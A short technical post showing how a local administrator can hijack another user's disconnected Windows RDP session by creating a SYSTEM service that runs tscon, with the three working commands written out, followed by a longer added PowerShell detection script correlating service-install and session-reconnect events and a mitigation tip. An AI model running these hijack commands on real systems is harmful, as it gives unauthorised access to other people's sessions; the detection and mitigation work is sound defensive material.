Windows: switching to another logged-in user's session

List logged-in users:

C:\Windows\system32>query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 administrator                             1  Disc           1  3/12/2017 3:07 PM
>localadmin            rdp-tcp#55          2  Active         .  3/12/2017 3:10 PM

C:\Windows\system32>

Create a service (it runs as SYSTEM, which is why tscon can reconnect the disconnected session without a password):

C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
[SC] CreateService SUCCESS

Start the service:

C:\Windows\system32>net start sesshijack

Details:
http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
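From the defender's side, the three steps above leave a recognisable trail: the `sc create` shows up as Service Control Manager event 7045 ("A service was installed in the system") in the System log with `tscon` in the service file name, and the reconnect itself is logged as Security event 4778 ("A session was reconnected to a Window Station") moments later. The following PowerShell hunt is an added example, not part of the original post or of korznikov's write-up. It assumes it is run from an elevated prompt on the host being reviewed, that both logs still hold events for the lookback period, and that a reconnect within five minutes of such a service install is worth flagging; the field names it reads (ServiceName, ImagePath, AccountName, SessionName, ClientName) are the standard EventData names of those two events.

```powershell
# Added example: hunt for the "service that runs tscon" pattern and correlate it
# with the session reconnects it produces. Not from the original post.
# Assumptions: elevated PowerShell, local System and Security logs, and the
# default lookback/correlation windows below (both are hypothetical choices).
param(
    [int]$LookbackHours = 24,
    [int]$CorrelationWindowMinutes = 5
)

$since = (Get-Date).AddHours(-$LookbackHours)

# Pull one named EventData field out of an event record via its XML view.
function Get-EventDataField {
    param(
        [System.Diagnostics.Eventing.Reader.EventRecord]$Event,
        [string]$Name
    )
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

# Step 1: service installs (System 7045) whose binary path invokes tscon.
# The post's example path is: cmd.exe /k tscon 1 /dest:rdp-tcp#55
$suspiciousInstalls = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $imagePath = Get-EventDataField -Event $_ -Name 'ImagePath'
        if ($imagePath -match '(?i)\btscon(\.exe)?\b') {
            [pscustomobject]@{
                Time        = $_.TimeCreated
                ServiceName = Get-EventDataField -Event $_ -Name 'ServiceName'
                ImagePath   = $imagePath
                RunsAs      = Get-EventDataField -Event $_ -Name 'AccountName'
            }
        }
    }

# Step 2: session reconnects (Security 4778) in the same lookback window.
$reconnects = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4778; StartTime = $since } -ErrorAction SilentlyContinue

# Step 3: report each suspicious install together with any reconnect that
# followed it within the correlation window. A reconnect whose ClientName is
# the local host (tscon run locally) is the strongest indicator.
foreach ($install in $suspiciousInstalls) {
    $windowEnd = $install.Time.AddMinutes($CorrelationWindowMinutes)
    $followUps = $reconnects | Where-Object {
        $_.TimeCreated -ge $install.Time -and $_.TimeCreated -le $windowEnd
    }

    [pscustomobject]@{
        InstalledAt   = $install.Time
        ServiceName   = $install.ServiceName
        ImagePath     = $install.ImagePath
        RunsAs        = $install.RunsAs
        Reconnects    = @($followUps | ForEach-Object {
            '{0} {1}\{2} -> {3} from {4}' -f $_.TimeCreated,
                (Get-EventDataField -Event $_ -Name 'AccountDomain'),
                (Get-EventDataField -Event $_ -Name 'AccountName'),
                (Get-EventDataField -Event $_ -Name 'SessionName'),
                (Get-EventDataField -Event $_ -Name 'ClientName')
        })
        ReconnectCount = @($followUps).Count
    }
}
```

Save it as a script and run it, for example, as `.\Find-TsconService.ps1 -LookbackHours 72`. An empty result only means this particular path (a persistent service created with `sc create`) was not used; it says nothing about other ways of running tscon as SYSTEM. The underlying exposure is the disconnected session itself: a session left in the `Disc` state stays reconnectable for as long as it exists, so the practical mitigation is to have users log off rather than disconnect and to enforce it with the Remote Desktop Session Host policy "Set time limit for disconnected sessions".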
